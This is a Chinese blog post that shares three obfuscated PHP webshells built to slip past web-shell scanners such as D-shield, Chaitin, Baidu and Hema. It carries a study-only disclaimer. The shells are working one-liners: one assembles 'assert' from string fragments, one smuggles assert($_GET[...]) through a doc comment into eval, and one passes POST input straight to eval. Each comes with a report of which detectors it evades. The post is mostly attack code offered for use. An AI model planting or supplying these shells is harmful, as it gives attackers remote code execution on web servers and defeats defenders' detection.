过D盾php webshell免杀马探讨

前言:

本文章仅用于渗透交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任

最近有在系统的总计waf绕过内容和后缀的绕过,把以前别的师傅发过的很多东西做了一些总结
在这个过程中发觉了其实webshell的bypass手法还是蛮多的
后缀bypass总结完了 经过实战也绕过了很多家最新的waf后缀
内容的还没写完 东西有点多
image.png
这里就分享一些php免杀的马 全过的也有贼多 但是暂时就不分享了

版本限制

使用条件:版本<7.1可用

这里发的是除了百度以外全过的(当然有全过的 但是暂时不会发出来)

马内容:
<?php

class get{
        public $x="";
        public $y="";
        public function setName($name=1){
                return $this -> name = $name;
        }
}
$obj = new get();
$s = $obj -> setName($name="ass");
$s = $s."ert";
$a = " $_POST[1]";
$b=null;
$s($b.$a);
?>
bypass情况:

最新版D盾
image.png
长亭
image.png

百度家的没过
image.png
在线的 这个不建议使用 效果就离普 其他都能查出的他不行
image.png
河马
image.png

版本未限制的

马1(这个只过了d盾 不太理解这个d盾为啥不查)

内容:

<?php  
    /**   
    * assert($_GET[1+0]);
    */  
    class User { }  
    $user = new ReflectionClass('User');
    $comment = $user->getDocComment();
    $d = substr($comment , 14 , 20);
    eval($d);
?>

image.png
d盾
image.png
长亭
image.png
百度
image.png

河马也不过
image.png

马2

马内容:

<?php
class get{
        public $x="";
        public $y="";
        
        public function setName($name=1){
                return $this -> name = $name;
        }
}
$obj = new get();
$s = $obj -> setName($name="$_POST[1]");
eval($s);

bypass情况:
除百度其他的都过了
image.png
d盾
image.png
长亭的
image.png
百度
image.png
河马
image.png

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

goddemon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值